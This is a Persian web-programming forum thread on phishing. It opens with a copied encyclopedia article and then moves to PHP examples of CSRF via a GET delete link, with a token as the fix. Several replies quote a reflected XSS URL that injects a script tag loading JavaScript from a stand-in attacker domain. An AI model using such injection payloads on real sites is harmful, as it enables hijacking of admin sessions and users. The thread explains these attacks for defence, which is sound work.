# زبان های اسکریپتی > PHP > امنیت در PHP >  حملات فیشینگ (Phishing)

## abolfazl-z

دوستان این حمله جنبه عمومی(PHP و ASP و ...) داره ولی خوب گفتن اش ضرری نداره.

فیشینگ (به انگلیسی: Phishing)‏ به تلاش برای بدست آوردن اطلاعاتی مانند نام کاربری، گذرواژه، اطلاعات حساب بانکی و... از طریق جعل یک وب‌سایت، آدرس ایمیل و... گفته می‌شود.
شبکه‌های اجتماعی و وب‌سایت‌های پرداخت آنلاین از جمله اهداف حملات فیشینگ هستند. علاوه بر آن، ایمیل‌هایی که با این هدف ارسال می‌شوند و حاوی پیوندی به یک وب‌سایت هستند در اکثر موارد حاوی بدافزار هستند. [۱]
محتویات

    ۱ تاریخچه
    ۲ نحوه کار فیشینگ
    ۳ روش‌های مختلف فیشینگ
        ۳.۱ جعل و دستکاری پیوندها و آدرس‌ها
        ۳.۲ گریز از فیلترها
        ۳.۳ جعل وب‌گاه
        ۳.۴ فیشینگ تلفنی
    ۴ روش‌های مقابله
        ۴.۱ توجه به پیوندها
    ۵ مقابله با فیشینگ
    ۶ پیوند به بیرون
    ۷ منابع

*تاریخچه*
روش فیشینگ با جزئیات در سال ۱۹۸۷ توضیح داده شده است و این واژه برای اولین بار در سال ۱۹۹۵ مورد استفاده قرار گرفته است. واژه‌ی فیشینگ مخفف عبارت Password Harvesting Fishing (شکار کردن گذرواژه کاربر از طریق یک طعمه) است که در آن حرف Ph به جای F برای القای مفهوم فریفتن جایگزین شده است. [۲]
نحوه کار فیشینگ

فیشینگ یا سرقت آنلاین در عمل به صورت کپی دقیق رابط گرافیکی یک وب‌گاه معتبر مانند بانک‌های آنلاین انجام می‌شود. ابتدا کاربر از طریق ایمیل و یا آگهی‌های تبلیغاتی سایت‌های دیگر، به این صفحه قلابی راهنمایی می‌شود. سپس از کاربر درخواست می‌شود تا اطلاعاتی را که می‌تواند مانند اطلاعات کارت اعتباری مهم و حساس باشد، آنجا وارد کند. در صورت گمراه شدن کاربر و وارد کردن اطلاعات خود، فیشرها به اطلاعات شخص دسترسی پیدا می‌کنند. از جمله سایت‌های هدف این کار می‌توان سایت‌های پی‌پال، ای‌بی و بانک‌های آنلاین را نام برد.

*روش‌های مختلف فیشینگ*

*جعل و دستکاری پیوندها و آدرس‌ها*
این روش یکی از شیوه‌های متداول فیشینگ است. در این روش، پیوندها و آدرس‌های سازمان‌ها و شرکت‌های غیرواقعی و جعلی از طریق ایمیل ارسال می‌شود. این آدرس‌ها با آدرس‌های اصلی تنها در یک یا دو حرف تفاوت دارند.

*گریز از فیلترها*
فیشرها برای جلوگیری از شناسایی متن‌های متداول فیشینگ در ایمیل‌ها توسط فیلترهای ضد-فیشینگ از عکس به جای نوشته استفاده می‌کنند.

*جعل وب‌گاه*
برخی از فیشرها از جاوااسکریپت برای تغییر آدرس در نوار آدرس مرورگر استفاده می‌کنند تا هیچ جای شکی برای قربانی نماند. یک مهاجم حتی می‌تواند به کمک حملات تزریق کد از ایرادهای موجود در اسکریپت‌های یک سایت معتبر بر علیه خودش استفاده کند. در این نوع فیشینگ از کاربر خواسته می‌شود تا در بانک خودش لاگین کند. ظاهرا همه چیز عادی است. از آدرس وب‌گاه گرفته تا گواهینامه امنیتی (به انگلیسی: Security Certificates)‏. اما در واقعیت، پیوند به آن وب‌گاه دستکاری می‌شود تا با استفاده از عیب‌های موجود در اسکریپت‌های آن وب‌گاه، حمله انجام شود. با این حال این روش نیازمند دانش و آگاهی بالایی است. از این روش 
در سال ۲۰۰۶ برای حمله به وب‌گاه پی‌پل استفاده شد.

*فیشینگ تلفنی*
تمام حملات فیشینگ نیازمند وب‌گاه قلابی نیست. پیامهایی که ظاهراً از طرف بانک فرستاده شده و از کاربر می‌خواهد تا مثلاً به دلیل وجود ایراد در حسابشان، شماره خاصی را شماره گیری کنند، نیز می‌تواند حمله فیشینگ باشد. بعد از گرفتن شماره (که متعلق به فیشر است و با سرویس صدا از طریق آی پی مهیا شده‌است)، از کاربر خواسته می‌شود تا شماره حساب و پین (PIN) خود را وارد کند.

_روش‌های مقابله_

*توجه به پیوندها*
یکی از ساده‌ترین روش‌های مقابله با فیشینگ دقت به آدرس وب‌سایت و یا ایمیل دریافت شده است. به عنوان مثال در زمان ورود به حساب‌های حساس مانند ایمیل و یا بانک، قبل از وارد کردن نام کاربری و گذرواژه، دقت به آدرس وب‌سایت حیاتی است.

*مقابله با فیشینگ*
استفاده از نرم‌افزارهای ضد هک و فیشینگ مانند کومودو که با فایروال قوی خود مانع هک شدن می‌شود. برای جلوگیری از افزایش آمار فیشینگ و سرقت اطلاعات باید آگاهی کاربران را افزایش داد. نباید به ایمیل هایی که از شما در آنها خواسته شده تا فرمی را پر کنید اطمینان کرد. نباید اطلاعات حساب کاربری خود را در اختیار سایت ها قرار داد. کاربران برای پرداخت آنلاین باید از درگاه های مخصوص بانک ها استفاده کنند. سعی کنید به ایمیل های داخل Spam در حساب کاربری تان بی اعتنا باشید و آنها را پاک کنید.


منبع : ویکی پدیا

----------


## navid3d_69

البته فیشینگ  به امنیت کاربر بیشتر بر می گرده تا اسکریپت و سایتی که برنامه نویس می نویسه

----------


## abolfazl-z

> البته فیشینگ  به امنیت کاربر بیشتر بر می گرده تا اسکریپت و سایتی که برنامه نویس می نویسه


به مثال های ذیل توجه کنید :



```
www.example.com/admin?id_del=1
```

 
نگاه کنید برای مثال ما یک آدرس بصورت بالا داریم که پس وارد شدن ادمین این آدرس کار میکنه در غیر این صورت خطا میده که باید وارد شوید.

خوب اگه کسی بیاد این لینک رو برای قربانی ارسال کند ! پست 1 اش پاک میشود و یا موارد دیگر ...

که برای جلوگیری از این حمله باید از توکن استفاده کنیم.
----------------------------------------------------------------

یا بر فرض مثال ما یک صفحه ای داریم که فقط ادمین میتونه وارد بشه !

خوب آدرس این صفحه بصورت ذیل هست :


```
www.example.com/post.php?message=Id is mistake!
```

 خوب تا اینجا همه چی درست هست.

حالا اگر هکٍر بیاید قربانی رو به آدرس ذیل بفرستد چی ؟



```
www.example.com/post.php?message=<script scr="www.websitehacker.coom/add.js"></script>
```

 اگر اینجا ما فیلتر نکنیم باعث بروز مشکل میشه!
 و و و ....

----------


## masiha68

> به مثال های ذیل توجه کنید :
> 
> 
> 
> ```
> www.example.com/admin?id_del=1
> ```
> 
>  
> ...


 اینایی که گفتی جالب ... ولی راه چاره چیه ؟؟
من دیدم توی وبسایت های مثل یاهو جزئیات هر پیج (منظور url ) خودش تولید میشه ونمیشه حدس زد مثلا توی فولدر اسپم ادرس چه جوری میشه ... فک کنم با این روش بشه جلوی این خرابکاری ها  رو گرفت :)

----------


## abolfazl-z

> اینایی که گفتی جالب ... ولی راه چاره چیه ؟؟
> من دیدم توی وبسایت های مثل یاهو جزئیات هر پیج (منظور url ) خودش تولید میشه ونمیشه حدس زد مثلا توی فولدر اسپم ادرس چه جوری میشه ... فک کنم با این روش بشه جلوی این خرابکاری ها  رو گرفت :)


در همین انجمن راه های مقابله با آن ذکر شده.



```
www.example.com/admin?id_del=1
```

خوب این رو هم ذکر کردم که باید از یک توکن استفاده کنیم مثلا :


```
www.example.com/admin?id_del=1&token=asDASDQ324QR
```

این هم یک حمله XSS اما از طریق خود ادمین قربانی شده :


```
www.example.com/post.php?message=<script scr="www.websitehacker.coom/add.js"></script>
```

روش مقابله

----------


## navid3d_69

> به مثال های ذیل توجه کنید :
> 
> 
> 
> ```
> www.example.com/admin?id_del=1
> ```
> 
>  
> ...


اون بحث پاک کردن و توکن برای csrf هست

----------


## abolfazl-z

> اون بحث پاک کردن و توکن برای csrf هست


دوست عزیز به مجموعه ی این حملات فیشینگ گفته میشه که اگر دقت کرده باشید در بالا یکی از دفع حملات(XSS) را به تاپیک شما انتقال دادم !

----------


## olampiad

سلام
تشکر فراوان بابت راهنمایی هاتون

www.example.com/admin?id_del=1
وب سایت ما ابتدا چک میکنه که کاربر لاگینه یا نه.
اگه لاگین بود میره و تابع حذف رو اجرا میکنه.
حالا
هکر به سیستم کاربر دسترسی داشته باشه یا به ایمیلش دسترسی داشته باشه و .. 
دیگه به ما ربطی نداره.
چطوری بهتون بگم
به نظر من در این نوع حملات کاربر باید بیشتر مراقب باشه ن برنامه نویس.
شاید هم من خوب متوجه نشدم.
مرسی

----------


## abolfazl-z

> سلام
> تشکر فراوان بابت راهنمایی هاتون
> 
> www.example.com/admin?id_del=1
> وب سایت ما ابتدا چک میکنه که کاربر لاگینه یا نه.
> اگه لاگین بود میره و تابع حذف رو اجرا میکنه.
> حالا
> هکر به سیستم کاربر دسترسی داشته باشه یا به ایمیلش دسترسی داشته باشه و .. 
> دیگه به ما ربطی نداره.
> ...


نه دیگه شما باید یک توکن امنیتی بگذارید !

مثلا شما فکر کنید من لینک www.example.com/admin?id_del=1 را به هر طریقی که فکر اش را کنید برای کاربر اجرا می کنم.

مثل قرار دادن در آدرس یک عکس

مثل قرار دادن در آدرس یک آی فریم

مثل اجرا در جاوا اسکریپت

مثل redirect های پی در پی با جاوا اسکریپت برای جلوگیری از تشخیص نوع حملهپ

و .....

این اسکریپت شما است که مشکل امنیتی دارد !

----------


## olampiad

در این صورت حق با شماست.
آموزش ساخت توکن دارید؟
مرسی

----------

